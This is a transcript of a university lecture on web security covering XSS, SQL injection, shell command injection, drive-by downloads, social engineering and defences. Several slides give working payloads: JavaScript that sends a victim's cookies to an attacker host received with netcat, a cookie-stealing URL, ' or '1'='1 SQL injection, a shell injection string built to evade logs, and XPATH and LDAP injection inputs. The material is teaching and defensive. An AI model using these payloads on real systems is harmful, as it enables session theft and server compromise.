1 / 54

Web Security

Web Security. Objectives. Understand the complexity of Web infrastructure and current trends of Web threat Understand the mechanisms and defense of major Web attacks: XSS, SQL injection and shell attacks. Why Web Security: a Real Business Problem.

rooney-chaney
Télécharger la présentation

Web Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Web Security

  2. Objectives • Understand the complexity of Web infrastructure and current trends of Web threat • Understand the mechanisms and defense of major Web attacks: XSS, SQL injection and shell attacks

  3. Why Web Security: a Real Business Problem • > 60% of total attack attempts observed on the Net are against Web applications • > 80% of vulnerabilities discovered are in web apps • Independent security audit • Regulatory compliance

  4. Auditor finding • Freeform edit box • Message to Customer Service • XSS issue raised • Must provide a response: • Prove issue to be a non-problem or • Describe actions to take

  5. Anatomy of Web Attacks Attacker breaks into a legitimate website and posts malware Malware is no longer exclusive to malicious Web sites. Attacking end-user machines. Malware on a Web site makes its way down on to a user’s machine when that user visits the host Web site. “Drive-by-download” – happens automatically with no user interaction required Additional techniques which do require some input from the user, but in practice are equally, if not more so, effective. Leveraging end user machines for malicious activity.

  6. Anatomy of Web Attacks Source: Web Based Attacks, Symantec 2009

  7. Web Applications • Big trend: software as a (Web-based) service • Online banking, shopping, government, etc. • Cloud computing • Applications hosted on Web servers • Written in a mixture of PHP, Java, Perl, Python, C, ASP • Security is rarely the main concern • Poorly written scripts with inadequate input validation • Sensitive data stored in world-readable files

  8. Typical Web Application Design • Runs on a Web server or application server • Takes input from Web users (via Web server) • Interacts with back-end databases and third parties • Prepares and outputs results for users (via Web server) • Dynamically generated HTML pages • Contain content from many different sources, often including regular users • Blogs, social networks, photo-sharing websites… • Web advertisements, usually third party • A webpage can have content coming from 10-20 different domains

  9. Two Sides of Web Security • Web browser (front end) • Can be attacked by any website it visits • Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data • Web application (back end) • Runs at website • Banks, online merchants, blogs, Google Apps, etc. • Written in Javascript, PHP, ASP, JSP, Ruby, … • Many potential bugs: XSS, SQL injection, XSRF • Attacks lead to stolen credit cards, defaced sites, etc.

  10. Chicago Tribune Home Page

  11. How Are Legitimate Web Sites Compromised? • SQL Injection Attacks • Cross-site scripting (XSS) attacks • Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks) • Malicious Advertisements • Many Web sites today display advertisements hosted by third-party advertising sites • Volume of ads published automatically makes detection difficult • Random appearances further compounds the detection • Search Engine Result Redirection • Attacks on the backend virtual hosting companies

  12. JavaScript • Language executed by browser • Scripts are embedded in Web pages • Can run before HTML is loaded, before page is viewed, while it is being viewed or when leaving the page • Used to implement “active” web pages • AJAX, huge number of Web-based applications • Many security and correctness issues • Attacker gets to execute some code on user’s machine • Often used to exploit other vulnerabilities

  13. Cross Site Scripting • Attacker goal: their code into browser • XSS forces a website visitor to execute malicious code in his/her browser • Count for roughly 80% of all documented security vulnerabilities

  14. XSS Risks • XSS abuses render engines or plug-ins • Steal browser cookies • Steal session info for replay attack • Malware or bot installation • Redirect or phishing attempt

  15. XSS Example 1 • Trudy posts the following JavaScript on a message board: • <script language="javascript"> var url = "http://machineaddress:5000/index.html?cookie=“+ encodeURI(document.cookie); </script> • Then run a TCP server listening on port 5000 with e.g., nc –l 5000 • When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

  16. Web Attack Demo Flow Chart

  17. XSS Demo Instructions • Set port forward to bypass the firewall ssh -L 9000:netsec-demos:2000 ychen@hamsa.cs.northwestern.edu Note: 9000 is the local port, it's forwarded to netsec-demos port 2000 through hamsa proxy • Use http://localhost:9000 to access http://netsec-demos.cs.northwestern.edu:2000

  18. XSS Demo Instructions (II) • Login as ychen and post the script with a sexy title (e.g., hot game!) <script language="javascript"> var url = "http://netsec.cs.northwestern.edu:5000/index.html?cookie="; url = url + encodeURI(document.cookie); new Image().src=url; </script> Hi Everyone! Thanks for your cookies! • Ssh to that machine (e.g., netsec.cs.northwestern.edu) and run nc –l –p 5000

  19. Simple XSS Code var url = "http://machineaddress:5000/index.html?cookie=“+ encodeURI(document.cookie); • document.cookie is the browser's entire cookie for the current website • encodeURI() is a javascript function to hex-encode certain characters to be included as part of a URL • E.g., changing the space character to %20 • Make the URL less suspicious

  20. What can Trudy Do with the Cookie? • Another user test458 login as and when clicking the post, cookie is sent to the attacker • Crack Bob’s password (MD5 hash in the cookie) with John the Ripper, Hydra, or any password cracker • For more info, http://netsec.cs.northwestern.edu/resources/password-cracking/ • Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bob

  21. XSS Detection • A client usually is not supposed to send scripts to servers • If the server receives <SCRIPT>… or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet, then an attack has occurred • A sanitized script could look like &ls;SCRIPT&gt;… • Any user input must be preprocessed before it is used inside HTML

  22. SQL Injection Malicious SQL statements run on a database and thus attack the server XSS can only target other users

  23. SQL Injection Example • Trudy accesses Bob’s website; in which he does not validate input on his sign in form • Runs a SQL statement like the following: • select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe’; • Set username to ' or '1'='1 • select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1’; • Effect: picks any row where the username is blank and the password matches or any row where true. • Add “limit 1” to pick the first row

  24. SQL Injection Detection • Input validation on any outgoing SQL statements from the web server to the database server • Filter • Apostrophes, semicolons, percent symbols, hyphens, underscores, … • Any character that has special meanings must be escaped, .e.g., convert ’ into \’ • Only works for string inputs • Different databases have different rules for escaping • Check the data type (e.g., make sure it’s an integer)

  25. Shell Attacks Control an actual machine like a web server

  26. Shell Attacks • Inject commands into scripts that use Linux utilities • E.g., with “;” as command separator in UNIX/LINUX • CGI programs like perl can use command-line programs (e.g. grep, ls) • Unsanitized input as arguments can lead to command execution.

  27. Shell Attacks Demo • Search engine in MiniBB webserver executes system("echo $user_usr " . $phrase . " >>/tmp/searchlogs"); • Put phrase as: >/dev/null; id; echo randomdata • Hide user ID • Store random data in logs to evade detection

  28. Discussion of Symantec White Papers: GETTING ONTO A USER’S COMPUTER (AUTOMATICALLY)

  29. GETTING ONTO A USER’S COMPUTER Source: Web Based Attacks, Symantec 2009

  30. Drive-by Download Attacks • Deliver malware from Websites to a users computer. • Exposure • Browsing a website • No user interaction is required • Executable content is automatically downloaded

  31. “Click Jacking”

  32. GETTING ONTO A USER’S COMPUTER(WITH A LITTLE HELP FROM THE USER)

  33. Social Engineering Source: Web Based Attacks, Symantec 2009 • People are tricked into performing actions they would not otherwise want to perform

  34. Types of Social Engineering Attacks • Fake Codec • Malicious Peer-to-Peer (P2P) Files • Malicious Advertisements • Fake Scanner Web Page • Blog Spam • Other Attack Vectors • Spam • Pirated software

  35. Fake Codec • User is prompted to install a missing codec • Codec is actually malware code • Usually a trojan horse

  36. Malicious Peer-to-Peer (P2P) Files • Malware authors bind content into popular applications • Files named after celebrities, popular bands • Uploaded to popular P2P sites where they are downloaded by unsuspecting users • Openly available how-to materials on the internet • Details how to build and distribute malware • Pay-Per-Install malware

  37. Fake Scanner Web Page • Tools that claim to scan for and remove adult images, etc. • Create a web site or product that misrepresents the truth • JavaScript pop-ups notifying of false need to install operating system updates Source: Web Based Attacks, Symantec 2009

  38. Blog Spam • Alluring links posted on blogs • Links embedded in blog comments • Direct users to sites that leverage social engineering tricks or browser exploits to spread malware

  39. Other Attack Vectors • Spam • Emails contain links directing people to drive by download, fake scanner/codec, and malware sites • Pirated software sites • Pirated versions of software are bundled with or comprised solely of trojan horses

  40. How to Protect Yourself(Client side) • Update and Patch Software • Get latest OS, Browser, Application patches • Browser Plug-in updates often forgotten • Endpoint Protection Software • Anti-virus software for signature based detection and behavioral monitoring • Update Protection Software Subscription • Could miss 70,000 new unique virus variants for one week • Be Suspicious • Avoid things that seem too good to be true • Adopt Strong Password Policy

  41. Web Reputation Systems(ISP/Enterprise side) • Web Reputation Agent (agent) will first check blacklist/whitelist database deployed locally. • If the URLs in the database, agent allows/rejects the URL requests DIRECTLY. • Otherwise, agent will send the URL to Intelligent Cloud Network for deeper detection. Local Blacklist/Whitelist Database Web Reputation Agent Web Reputation System in Intelligent Cloud Network

  42. Summary • Complexity of Web infrastructure and current trends of Web threat • Mechanisms and defense of major Web attacks • XSS • SQL injection • Shell attacks • New Web attack trends in Symantec white paper

  43. Backup Slides

  44. Defense Approaches • Web firewall/IDS • ModSecurity for Apache • Commercial: SecureSphere from Imperva • Static code analysis • Open source: Nikto • Commercial: • Acutenix Web Vulnerability Scanner • N-stalker • Education on good coding • HTML encoding on input (server-side) • Input validation/filtering

  45. Existing Systems Comparison

  46. Intelligent Cloud Network Crowd Sourcing Engine • Web Reputation Agent passes URLs to four fast detecting engines: Crowd Sourcing, URL Classification, Phishing Detection and webpage static engines. • These four engines are lightweight and therefore they can detect very fast. • These four engines return the scores to Result Processing Center (RPC), which standardized the four scores and generate a final score. • If the final score strongly indicates the URLs are legitimate or malicious, RPC returns the score to Web Reputation. Otherwise, RPC passes the URLs to Web Sandbox, which is a heavyweight detecting engine and will detect the URL by executing the contents in the URL. Result Processing Center Web Reputation Agent URL Classification Engine Web Sandbox (Dynamically executing WebPages ) PhishingDetection Engine Webpage Static Detection Engine

  47. XSS Example 2 • Trudy sends a link of the following URL to Bob that will take him to a personalized page: • http://host/personalizedpage.php?username=<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script> • A page is returned that contains the malicious script, and Bob’s browser executes the script causing his session cookie to be sent to Trudy • Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

  48. XPATH Injection Example • Similar to SQL injection • Bob has a form that does not sanitize user-provided input before using it as part of an XPATH query:: • string(//user[name/text()=’USER_NAME' and password/text()=’USER_PASS']/account/text()) • Trudy again can provide the following password to change the statement’s logic: • X’ OR ‘x’=‘x • The statement thus selects the first account

  49. LDAP Injection Example • Server using LDAP for authentication • User name initialized, but then uses unchecked user input to create a query filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry • Attacker can exploit using special characters http://example/ldapsearch.asp?user=*

More Related